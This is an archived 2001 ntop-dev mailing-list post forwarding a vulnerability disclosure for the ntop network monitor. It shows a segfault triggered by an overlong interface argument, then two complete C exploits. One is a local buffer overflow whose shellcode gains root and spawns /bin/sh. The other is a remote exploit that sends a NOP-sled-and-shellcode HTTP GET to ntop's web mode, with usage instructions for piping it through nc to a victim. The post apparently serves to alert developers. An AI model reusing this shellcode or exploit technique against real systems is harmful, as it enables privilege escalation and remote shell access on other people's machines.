[prev in list] [next in list] [prev in thread] [next in thread]
List: ntop-dev
Subject: [Ntop-dev] ntop hack:((((((((((((((
From: <Alexei.Voronine () dvg ! de>
Date: 2001-10-11 7:31:27
Message-ID: OF5AEE0CD3.C790C17E-ONC1256AE2.00289EAB () i001 ! dvg ! sko ! de
[Download RAW message or body]
Hi,
Look at that!!!
Source
http://www.webdoc.ru/text.phtml?level=2&id=98&script_id=237&url=texts/201-300/237.html
(in russian, use online translator on altavista.com)
tshaw:/home/cb/ntop-1.3.2$ ./ntop -i `perl -e 'print "A"x2835'`
24/Oct/2000:12:32:16 ntop v.1.3.2 MT [i686-pc-linux-gnu] (08/11/00
07:04:32 PM build)
24/Oct/2000:12:32:16 Listening on
[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
24/Oct/2000:12:32:16 Copyright 1998-2000 by Luca Deri <deri@ntop.org>
24/Oct/2000:12:32:16 Get the freshest ntop from http://www.ntop.org/
24/Oct/2000:12:32:16 Initialising...
Segmentation fault
tshaw:/home/cb/ntop-1.3.2$
EXPLOIT
========
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#define LEN 208
int main (int argc, char **argv)
{
char buf[LEN + 12];
intret = 0xbffffba0;
int*p;
char code[]=
"\x31\xdb\xb8\xb7\xaa\xaa\xaa\x25\xb7\x55\x55\x55\x53\x53\xcd\x80"
"\x31\xdb\xb8\x17\xaa\xaa\xaa\x25\x17\x55\x55\x55\x53\x53\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
if (argc > 1) {
ret += atoi(argv[1]);
fprintf(stderr, "Using ret %#010x\n", ret);
}
memset(buf, '\x90', LEN);
memcpy(buf + LEN - strlen(code), code, strlen(code));
p = (int *) (buf + LEN);
*p++ = ret;
*p++ = ret;
*p = 0;
execl("./ntop", "ntop", "-i", buf, NULL);
}
REMOTE EXPLOIT
=================
#include <stdio.h>
#include <string.h>
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
void usage()
{
printf("NTOP ntop-1.2a1 -w mode command execution exploit.\n");
printf(" mat@hacksware.com\n");
printf("Usage : ./ntop-w-exp | nc victim port\n");
exit(0);
}
void main( int argc, char *argv[] )
{
int i,offset=-24;
#define CODE_LEN 240
#define NOP_LEN 50
char code_buf[CODE_LEN];
unsigned long esp=0xbedffb00;
if(argc >= 2) offset = atoi(argv[1]);
memset(code_buf,0x90,NOP_LEN); //insert NOP CODES
memcpy(code_buf+NOP_LEN, shellcode, strlen(shellcode));
for(i=strlen(shellcode)+NOP_LEN;i<=CODE_LEN;i+=4)
*(long *)&code_buf[i]=(unsigned long)esp-offset;
printf("GET /");
for(i=0;i<CODE_LEN; i++)
{
putchar(code_buf[i]);
}
printf("\r\n\r\n");
}
Mit freundlichen Grüßen
Alexei Voronine
dvg Hannover
OE352 UNIX Server Control Center (USCC)
e-Mail Alexei.Voronine@dvg.de
Tel: 0511-5102-3703
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic